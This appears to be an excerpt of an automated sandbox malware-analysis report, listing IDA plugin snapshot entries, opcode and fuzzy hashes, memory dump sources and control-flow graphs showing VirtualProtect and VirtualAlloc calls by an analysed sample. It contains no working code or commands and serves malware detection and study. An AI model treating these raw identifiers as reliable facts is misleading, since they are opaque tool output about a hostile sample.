                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bb606ad6ad0c52f75895b578e29ab8b2bef2f1917402f6634a4f12e340e0fbd4
                                                                                                                    • Instruction ID: 96fbe97cb2ea64e645ec86f03e48eb1def3cbab9541894a3ca82b8e7bbe552b4
                                                                                                                    • Opcode Fuzzy Hash: bb606ad6ad0c52f75895b578e29ab8b2bef2f1917402f6634a4f12e340e0fbd4
                                                                                                                    • Instruction Fuzzy Hash: 7EF0623554E2C99FD3128BB088615E97FB4BF43204B1A01E6D44A870B2C66C6656CB61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 46f4a5845dd58485e1de8a2bf5f2953e035847006554adedf663d5be5f1bdedc
                                                                                                                    • Instruction ID: 15a4a98a17e61b6fe3afeb5ef5792edb7a3f455cc40c61ffbfb17e3f6413186c
                                                                                                                    • Opcode Fuzzy Hash: 46f4a5845dd58485e1de8a2bf5f2953e035847006554adedf663d5be5f1bdedc
                                                                                                                    • Instruction Fuzzy Hash: A3016D31B0950E8FE760DF88C8597FE77B1FF98350F000276D419872A5DBB869858780
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7c0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 21f92c91cd31b1e1f5b9b35ec230644ed4708a97a499dd0b2ca7377882159bcf
                                                                                                                    • Instruction ID: 0aeb90a24cb1efcca8dcc3b65a85199906d8c0bb2b9d1452674ab7d44715796d
                                                                                                                    • Opcode Fuzzy Hash: 21f92c91cd31b1e1f5b9b35ec230644ed4708a97a499dd0b2ca7377882159bcf
                                                                                                                    • Instruction Fuzzy Hash: 73F0C231A48A09CFCB54DF08C495FA973B1FB98311F1586A9D00ED7260DA35AA85DF81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 11c627708a0511de0bce2e8d1825407373e689ef3a192d8ba2822c03c063a9fc
                                                                                                                    • Instruction ID: 856217bd410a3e9f986645d06970efe313f8b4432c81f1c873fc6a73f7a85a33
                                                                                                                    • Opcode Fuzzy Hash: 11c627708a0511de0bce2e8d1825407373e689ef3a192d8ba2822c03c063a9fc
                                                                                                                    • Instruction Fuzzy Hash: BEF02B31B5D7C80FC719962998A54A17BF1DF5B20134A02FBD487CB2E3DD18EC898751
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7c0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1f77fa3393b4c90766bdbc843341dc9ef514217ee941f10e202460e3bbe6a3ed
                                                                                                                    • Instruction ID: e44a74d622a26814dc411c5fba3bdab8f58ad4cffd7a4f357428296646858541
                                                                                                                    • Opcode Fuzzy Hash: 1f77fa3393b4c90766bdbc843341dc9ef514217ee941f10e202460e3bbe6a3ed
                                                                                                                    • Instruction Fuzzy Hash: 15012134E0E3899FD721EB6484945ADBFB0EF45304F1542EBC4449B2A6DA3456448781
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4179911396.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bbb0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 80d4ddd6eb1eb37c1fa05148fb771707183b1498188790f765149742b2e030ad
                                                                                                                    • Instruction ID: 127baa1bb6f6a2cc5968b4d4cd8433fb29b48ad164a3f3d3c36bd80143336b93
                                                                                                                    • Opcode Fuzzy Hash: 80d4ddd6eb1eb37c1fa05148fb771707183b1498188790f765149742b2e030ad
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: af4f31c499842eea8be21bdc961b6d6f2e6dda79bf286b0836ec3545df4825b6
                                                                                                                    • Instruction ID: f8f7aaf3211be6961c49428d8ec4ad29bc793b37ba88d905f305149261070dc8
                                                                                                                    • Opcode Fuzzy Hash: af4f31c499842eea8be21bdc961b6d6f2e6dda79bf286b0836ec3545df4825b6
                                                                                                                    • Instruction Fuzzy Hash: 25D05E30B10E0D4B8B0CA62D885C470B3D1E7A92027D45369940AC22A5ED25ECC9C784
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 088cb011852cd2a1c8a5da3bc6630739a1cfd1fadce4c197f184701d939d2cea
                                                                                                                    • Instruction ID: dd326a0b0c7cb4b1fbe7a57c44e9e9c3d5b5c71d32e2e03da0c24cebddb57eb1
                                                                                                                    • Opcode Fuzzy Hash: 088cb011852cd2a1c8a5da3bc6630739a1cfd1fadce4c197f184701d939d2cea
                                                                                                                    • Instruction Fuzzy Hash: 16D05E30B20E0D4B8B1CA62D886D430B3D1EBA92067945369940AC22A1ED25ECC5C784
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7c0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ff3051ce8f092a69e22551edfefc58e64b516ddd8f195051f1ddaf51897b9e82
                                                                                                                    • Instruction ID: 3ba68f50efb7a8f958bc3679fac23d9f33a696edc02a5dbcee2413c6c7eede2f
                                                                                                                    • Opcode Fuzzy Hash: ff3051ce8f092a69e22551edfefc58e64b516ddd8f195051f1ddaf51897b9e82
                                                                                                                    • Instruction Fuzzy Hash: 0EE01A74F0D61E97F768B284C8617F97265EB88300F15027CDA1EE33E2CE28AE418655
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 76592f7d02345b38f2d4603c29abbf2a639cd1ae121a14109da65a47c8eb365d
                                                                                                                    • Instruction ID: 631d8c819dd7f7e5b4e77d878dc85d1884bf34d21983717dec9d47b0a2f1391f
                                                                                                                    • Opcode Fuzzy Hash: 76592f7d02345b38f2d4603c29abbf2a639cd1ae121a14109da65a47c8eb365d
                                                                                                                    • Instruction Fuzzy Hash: 85D0A730711D0C4B8F0CB63C885843073D1E76D2067A401ADD00EC2291ED17DC86C740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f2ae8df03798cb0532701ebd5db25ee5c03e7614a58c158fa1eff98a1e41ffaf
                                                                                                                    • Instruction ID: 01a942b504b44d8063988e79ed20030cf4a895b0707a0d3a77d4a45ad231ed1f
                                                                                                                    • Opcode Fuzzy Hash: f2ae8df03798cb0532701ebd5db25ee5c03e7614a58c158fa1eff98a1e41ffaf
                                                                                                                    • Instruction Fuzzy Hash: 4CE0EC3054E7844FC70A9B24C8A99943FB0EF2621178A01E6C449CF5B3E65D9C8DC752
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2618b2db9be74617034c15a9afbb045faa693e469430d617a07d4fa608d3086d
                                                                                                                    • Instruction ID: 0d1de30e1751494720669ffc0a1fbd1ee1c89eccac3fb772d593e8af970be79d
                                                                                                                    • Opcode Fuzzy Hash: 2618b2db9be74617034c15a9afbb045faa693e469430d617a07d4fa608d3086d
                                                                                                                    • Instruction Fuzzy Hash: D8D01230B61D088FCB5CF73C88599B073D1EB6D21679540A9D00EC72B5E96ADDC9CB41
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9c07c102c2638efc47298e87093137f27c9d3fd086bb1f87f84279b7e015784f
                                                                                                                    • Instruction ID: 10be69758e4248434e273e276ad14fb938474d6917a812c1a01e08d879a908e6
                                                                                                                    • Opcode Fuzzy Hash: 9c07c102c2638efc47298e87093137f27c9d3fd086bb1f87f84279b7e015784f
                                                                                                                    • Instruction Fuzzy Hash: 97D0A930B228088F8B0CA72C889892032D0EB6D20278500A8D00AC32B1E92AD888C780
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                    • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                    • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7f1000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                                                                                    • Instruction ID: d65f8ec3371075526ae2c350cb3b8047b480f14774d2c599f973cead9dbb7b5c
                                                                                                                    • Opcode Fuzzy Hash: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                                                                                    • Instruction Fuzzy Hash: 09D02230B519040FC70CE63C88588303390EB6A2027C100A8D00AC72B1E92ADC88C781
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9b7c0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                    • Instruction ID: 448851d1f3fff70622fbbc0a2e6e0fd4297fba6e1b76768301220f664b380cb0
                                                                                                                    • Opcode Fuzzy Hash: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                    • Instruction Fuzzy Hash: 1DE01234B0930EDBE720EB94C4946FD7761EB51711F104369C401873E9DA786784C6C0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.4174614751.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:3%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:6
                                                                                                                    Total number of Limit Nodes:0
                                                                                                                    execution_graph 19961 7ffd9b7db4ba 19962 7ffd9b7db4c9 VirtualProtect 19961->19962 19964 7ffd9b7db5ae 19962->19964 19957 7ffd9b7dc491 19958 7ffd9b7dc49f VirtualAlloc 19957->19958 19960 7ffd9b7dc554 19958->19960

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 208 7ffd9b7d0d48-7ffd9b7d0d9b call 7ffd9b7d07d0 211 7ffd9b7d0da0-7ffd9b7d0eb9 208->211 226 7ffd9b7d0ef9-7ffd9b7d0f05 211->226 227 7ffd9b7d0ebb-7ffd9b7d0ef8 211->227 230 7ffd9b7d0f07-7ffd9b7d0f1d 226->230 231 7ffd9b7d0f1e 226->231 227->226 232 7ffd9b7d0f1f-7ffd9b7d0f63 230->232 231->232 237 7ffd9b7d0f65-7ffd9b7d0f9d 232->237 238 7ffd9b7d0fa3-7ffd9b7d1050 232->238 237->238
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7d0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5[_H
                                                                                                                    • API String ID: 0-3279724263

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: N_H
                                                                                                                    • API String ID: 0-1910052747

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 197 7ffd9b7db4ba-7ffd9b7db4c7 198 7ffd9b7db4c9-7ffd9b7db4d1 197->198 199 7ffd9b7db4d2-7ffd9b7db4e3 197->199 198->199 200 7ffd9b7db4e5-7ffd9b7db4ed 199->200 201 7ffd9b7db4ee-7ffd9b7db5ac VirtualProtect 199->201 200->201 205 7ffd9b7db5b4-7ffd9b7db5dc 201->205 206 7ffd9b7db5ae 201->206 206->205
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D7000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7d7000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 5aadb705e93be66c006d0ef059defc6db69513e58eb27470fe9fd2820127506d
                                                                                                                    • Instruction ID: 96435bdbfe142b3e09af28a80be3f588e4081a5effcefda508073b1e6e725c89
                                                                                                                    • Opcode Fuzzy Hash: 5aadb705e93be66c006d0ef059defc6db69513e58eb27470fe9fd2820127506d
                                                                                                                    • Instruction Fuzzy Hash: 5F412C3190D78C4FD7199BA898565E97FF0EF96321F0443AFD099C3193CA746406C792

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 243 7ffd9b7dc491-7ffd9b7dc49d 244 7ffd9b7dc4a1-7ffd9b7dc4dd 243->244 245 7ffd9b7dc49f 243->245 246 7ffd9b7dc4e1-7ffd9b7dc552 VirtualAlloc 244->246 245->244 245->246 249 7ffd9b7dc55a-7ffd9b7dc582 246->249 250 7ffd9b7dc554 246->250 250->249
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D7000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7d7000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: 04756d9c0501d438e41e5adf20a1198666507c7d453f3df8cd670d6c165695c2
                                                                                                                    • Instruction ID: 831ca31d8088c025a40b3d77225c57cd655a6ace0127c71836d8452f5b6534e2
                                                                                                                    • Opcode Fuzzy Hash: 04756d9c0501d438e41e5adf20a1198666507c7d453f3df8cd670d6c165695c2
                                                                                                                    • Instruction Fuzzy Hash: 9D31FB31A0CB8C4FDB1DAB6898166F97BF0EF96321F04426FD08AC3593DA65681687D1

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 252 7ffd9b801a49-7ffd9b801a7a 253 7ffd9b801a7e-7ffd9b801a83 252->253
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: H
                                                                                                                    • API String ID: 0-2852464175
                                                                                                                    • Opcode ID: 7fb2cd1e96c361bc97c451b0c6bf1d62838c49eeba54bbbcf8bcd13edf9ca410
                                                                                                                    • Instruction ID: becf1f39e9525a793ba07497bee1ae7102b934d9ba4949fd777c9ef4a46dbcae
                                                                                                                    • Opcode Fuzzy Hash: 7fb2cd1e96c361bc97c451b0c6bf1d62838c49eeba54bbbcf8bcd13edf9ca410
                                                                                                                    • Instruction Fuzzy Hash: 32E0D830B557844FCB0DAA2C88654607BB1EF57205B8552EAC046CB1A3DD1CDC86C741

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 254 7ffd9b80a529-7ffd9b80a53d 255 7ffd9b80a53f-7ffd9b80a55a 254->255 256 7ffd9b80a55e-7ffd9b80a563 255->256
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: e4335c15f8502fd7149023867cb01fdf5b34850c5552e529227bd14a7fc1a723
                                                                                                                    • Instruction ID: 9c1fd412609d37193d74b1f63005ae9c0c0a086f861702f3730ee312feda6007
                                                                                                                    • Opcode Fuzzy Hash: e4335c15f8502fd7149023867cb01fdf5b34850c5552e529227bd14a7fc1a723
                                                                                                                    • Instruction Fuzzy Hash: A2E0657160E7C44FC716D6744869454BFA0EF6721174A42EEC045CF5A7EA2DC885CB01

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 257 7ffd9b7f93e9-7ffd9b7f9414 259 7ffd9b7f9418-7ffd9b7f941d 257->259
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7F3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7f3000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: e6ba671bab6f85cbfdfc06a0eba5c7e1b00385242674e9a0bf3b912c69499f83
                                                                                                                    • Instruction ID: 3b0b8ed484c465483cbc07f443ba6c6e5324e6a3ae63e25c67437725e8b370ca
                                                                                                                    • Opcode Fuzzy Hash: e6ba671bab6f85cbfdfc06a0eba5c7e1b00385242674e9a0bf3b912c69499f83
                                                                                                                    • Instruction Fuzzy Hash: E3E0E56154E7C48FCB5AEA7488A98547FA0AE6721078A41EEC489CB1B3E6299849C701

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 260 7ffd9b801ad9-7ffd9b801aed 261 7ffd9b801aef-7ffd9b801b04 260->261 262 7ffd9b801b08-7ffd9b801b0d 261->262
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b801000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 82b5cee6cb806b32f99d2561997564095496820c05eabd3412fe45730a6a44d6
                                                                                                                    • Instruction ID: 61d0df85dbf79a5133c738b04a6214dfdee090dbd2ed0a8886aa52041204512c
                                                                                                                    • Opcode Fuzzy Hash: 82b5cee6cb806b32f99d2561997564095496820c05eabd3412fe45730a6a44d6
                                                                                                                    • Instruction Fuzzy Hash: B5E01A6154F7C44FCB16EB7488698497FA0EE6B21078B40EEC089CF1B3E62D8849CB01

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 263 7ffd9b807e19-7ffd9b807e44 265 7ffd9b807e48-7ffd9b807e4d 263->265
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
